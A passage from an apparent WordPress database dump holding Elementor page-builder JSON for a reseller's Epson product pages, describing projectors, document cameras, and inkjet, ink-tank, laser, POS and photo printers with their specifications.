BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(7727,3447,'_elementor_version','2.5.14'),(7738,3449,'_elementor_edit_mode','builder'),(7739,3449,'_elementor_template_type','post'),(7740,3449,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"76a7228\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EcoTank L3150<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2421\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L120 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/p><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson M1100 Printer<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2423\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson AcuLaser C9300N<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2424\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><\\/p><p>The Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Speed: Up to 30ppm<\\/li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li><li>Quality prints with new Epson Technologies<\\/li><li>New print job management features<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2426\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><\\/p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 35ppm<\\/li><li>Auto-Duplex<\\/li><li>Ethernet &amp; Epson iPrint<\\/li><li>2 optional paper cassette tray<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2427\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><\\/p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 40 ppm<\\/li><li>Epson iPrint<\\/li><li>Ethernet<\\/li><li>4 optional cassette trays<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2428\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T88V-i\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.<\\/p><ul><li>Printing speed of up to 300mm\\/second<\\/li><li>20 million lines for printer mechanism<\\/li><li>Up to 2 million for auto-cutter<\\/li><li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li><li>Control peripherals easily<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T70II\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><\\/p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L850 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L805 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 